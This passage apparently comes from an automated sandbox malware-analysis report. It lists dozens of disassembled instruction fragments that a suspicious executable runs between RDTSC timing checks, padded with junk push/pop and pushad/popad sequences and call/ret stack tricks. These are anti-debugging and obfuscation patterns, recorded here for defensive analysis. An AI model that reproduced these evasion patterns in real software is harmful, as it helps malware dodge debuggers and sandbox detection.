                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3245B second address: D3245F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3341E second address: D33422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33422 second address: D3342C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3342C second address: D33432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33432 second address: D33436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33436 second address: D33451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33451 second address: D334BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F1675279DA8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F1675279DA8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F1675279DA8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov ebx, 22909EE6h 0x0000004f push eax 0x00000050 push edi 0x00000051 pushad 0x00000052 jnc 00007F1675279DA6h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D314AD second address: D314B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31557 second address: D3155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D336AF second address: D336B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3557F second address: D35584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D376F6 second address: D3770C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3770C second address: D37710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37710 second address: D37723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E1Bh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3794E second address: D37954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A851 second address: D3A855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38AB2 second address: D38AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A855 second address: D3A869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jbe 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F1674F90E18h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D41D68 second address: D41D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D41D70 second address: D41D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C714 second address: D4C744 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1675279DAAh 0x00000008 jmp 00007F1675279DB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F1675279DAEh 0x00000016 jp 00007F1675279DA6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C744 second address: D4C74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B440 second address: D4B445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BA5D second address: D4BA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BA6C second address: D4BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BD03 second address: D4BD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1674F90E16h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007F1674F90E16h 0x00000016 popad 0x00000017 pushad 0x00000018 push edx 0x00000019 jmp 00007F1674F90E29h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C3E1 second address: D4C409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DB7h 0x0000000c jmp 00007F1675279DAAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C409 second address: D4C448 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F1674F90E16h 0x00000013 jnc 00007F1674F90E16h 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1674F90E1Ch 0x00000023 jmp 00007F1674F90E25h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C448 second address: D4C454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C454 second address: D4C458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F486 second address: D4F4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F1675279DBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE099E second address: CE09A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE09A8 second address: CE09AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54A4C second address: D54A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54A52 second address: D54A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54A57 second address: D54A68 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1674F90E1Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54A68 second address: D54A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5386F second address: D53874 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53874 second address: D5387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26208 second address: D0716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F1674F90E18h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 cld 0x00000021 lea eax, dword ptr [ebp+12487FA0h] 0x00000027 xor dword ptr [ebp+12459526h], edx 0x0000002d nop 0x0000002e jc 00007F1674F90E2Fh 0x00000034 push eax 0x00000035 jmp 00007F1674F90E27h 0x0000003a pop eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 pop ecx 0x00000041 pop eax 0x00000042 nop 0x00000043 mov dword ptr [ebp+1245224Fh], esi 0x00000049 call dword ptr [ebp+1244DF9Bh] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 pushad 0x00000055 popad 0x00000056 jne 00007F1674F90E16h 0x0000005c ja 00007F1674F90E16h 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 push esi 0x00000066 pop esi 0x00000067 jg 00007F1674F90E16h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26314 second address: D263DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007F1675279DB7h 0x0000000c pop edi 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F1675279DA8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007F1675279DB1h 0x0000002d xor edx, dword ptr [ebp+122D3702h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jmp 00007F1675279DACh 0x0000003f js 00007F1675279DA6h 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c cld 0x0000004d mov dword ptr [ebp+12487FF8h], esp 0x00000053 mov ch, CCh 0x00000055 cmp dword ptr [ebp+122D366Ah], 00000000h 0x0000005c jne 00007F1675279E7Fh 0x00000062 adc dh, FFFFFFB9h 0x00000065 mov byte ptr [ebp+122D3214h], 00000047h 0x0000006c jl 00007F1675279DA8h 0x00000072 mov eax, D49AA7D2h 0x00000077 or edi, dword ptr [ebp+12458111h] 0x0000007d nop 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F1675279DB6h 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26ADD second address: D26AE7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26BD2 second address: D26BF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1675279DB7h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F1675279DA6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26BF9 second address: D26C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E28h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE7412 second address: CE7416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE7416 second address: CE745C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 jmp 00007F1674F90E1Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F1674F90E2Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE745C second address: CE747E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DACh 0x00000008 jne 00007F1675279DACh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53E2F second address: D53E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53E33 second address: D53E39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53E39 second address: D53E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F1674F90E1Eh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53E53 second address: D53E74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DAEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DABh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5414F second address: D54166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F1674F90E1Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F1674F90E16h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54596 second address: D5459B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D06D second address: D5D078 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D078 second address: D5D08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1675279DADh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D53E second address: D5D563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a jmp 00007F1674F90E29h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D9CD second address: D5D9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1675279DABh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DF1D second address: D5DF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DF26 second address: D5DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E589 second address: D5E59F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1674F90E16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d je 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E59F second address: D5E5A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E5A6 second address: D5E5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1674F90E26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F1674F90E16h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E5D0 second address: D5E5DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1675279DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E5DA second address: D5E5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F1674F90E16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F1674F90E16h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CD4C second address: D5CD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CD50 second address: D5CD5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CD5F second address: D5CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F1675279DA6h 0x0000000f jmp 00007F1675279DADh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CD7B second address: D5CD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64364 second address: D64377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007F1675279DA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63034 second address: D63038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63038 second address: D6303C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6303C second address: D63048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D632D1 second address: D632D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D632D5 second address: D632DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63630 second address: D63636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D667EE second address: D667F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D667F4 second address: D667FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D667FD second address: D66801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D66801 second address: D66837 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F1675279DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F1675279DBDh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F1675279DA6h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D66837 second address: D66841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D66841 second address: D66847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D66847 second address: D66866 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1674F90E16h 0x00000008 jmp 00007F1674F90E25h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D66866 second address: D6686E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69578 second address: D695B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1674F90E1Eh 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E1Bh 0x00000014 jnl 00007F1674F90E16h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1674F90E1Fh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D695B3 second address: D695B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6E299 second address: D6E2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a jl 00007F1674F90E16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6E2AB second address: D6E2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72120 second address: D72136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Bh 0x00000009 jc 00007F1674F90E16h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72136 second address: D7213D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
